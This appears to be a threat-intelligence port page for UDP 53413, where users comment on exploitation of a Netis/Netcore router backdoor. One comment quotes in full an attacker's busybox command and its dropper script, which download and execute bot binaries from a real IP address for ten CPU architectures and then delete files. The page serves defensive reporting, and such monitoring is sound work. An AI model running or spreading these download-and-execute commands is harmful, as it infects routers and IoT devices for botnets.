Loading...
[get complete service list]
Port Information
Protocol Service Name
tcp --- ---
Top IPs Scanning
Today Yesterday
Port diary mentions
URL
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)
User Comments
Submitted By Date
Comment
2024-07-22 12:13:35
This busybox command was sent to UDP socket: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * 8UsA.sh file tries to load and execute backdoor for 10 different architectures: #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
2016-08-01 00:23:46
The devices causing this traffic seem to be IoT devices (DVR's IPCAM's etc.), possibly part of LizzardStresser or another botnet based on it
2016-02-03 10:29:11
This appears to be an attack against netcore routers - udp port 53413. It attempts to run various busybox / shell commands.
CVE Links
CVE # Description